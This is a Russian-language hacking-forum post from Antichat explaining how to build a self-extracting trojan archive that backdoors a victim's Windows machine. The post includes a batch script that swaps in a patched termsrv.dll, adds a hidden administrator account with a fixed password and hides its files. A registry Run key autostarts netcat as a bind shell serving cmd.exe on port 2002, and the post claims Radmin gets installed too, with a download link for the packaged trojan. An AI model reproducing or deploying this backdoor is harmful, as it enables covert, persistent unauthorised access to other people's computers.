Форум АНТИЧАТ - 3 в 1.nc,termsrv.dll,radmin

В один прекрасный моменты:) я подумал, что было бы неплохо совместить эти 3 вещи. При запуске такого файла, что нибудь да сработает)
Итак поехали. Принцип старый. Просто подкиним к SFX архиву еще несколько файлов и поменяем 111.bat и 111.reg.
Дописываем bat

Код:

ren %SystemRoot%\system32\DLLCache\termsrv.dll termsrv.old

ren %SystemRoot%\system32\termsrv.dll termsrv.old

copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll

copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\termsrv.dll

reg import key.reg

del %SystemRoot%\system32\DLLCache\termsrv.old

del %SystemRoot%\system32\termsrv.old

del %SystemRoot%\help\123\termsrv.dll

del %SystemRoot%\help\123\key.reg

net user asdf 1234 /add /expires:never /times:all

net localgroup "Ђ¤¬Ё*Ёбва*в®ал" asdf /add

del %SystemRoot%\help\123\run.cmd

attrib +r +h +s C:\Windows\Help\123\*

attrib +r +h +s C:\Windows\Help\123



Последние две строчки присваивают папке 123 и ее файлам параметры: скрытый, только чтение, системный

Дописываем reg

Код:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"nc.exe"="\"C:\\Windows\\Help\\123\\nc.exe.lnk\""

Эти строки отвечают за автозапуск nc.
Создадим ярлычок nc.exe и допишим там пару букв:

Цитата:

-d -L -n -e cmd.exe -v -p 2002

Ну и все осталось завернуть)м... Даже ico прилепим :D
Итого мы получили: У жертвы открыт 2002 порт, открыт удаленный доступ(пользователь:asdf, пароль:1234), стоит радмин(пароль 11223344).

Качаем ТУТ
Пароль: antichat.ru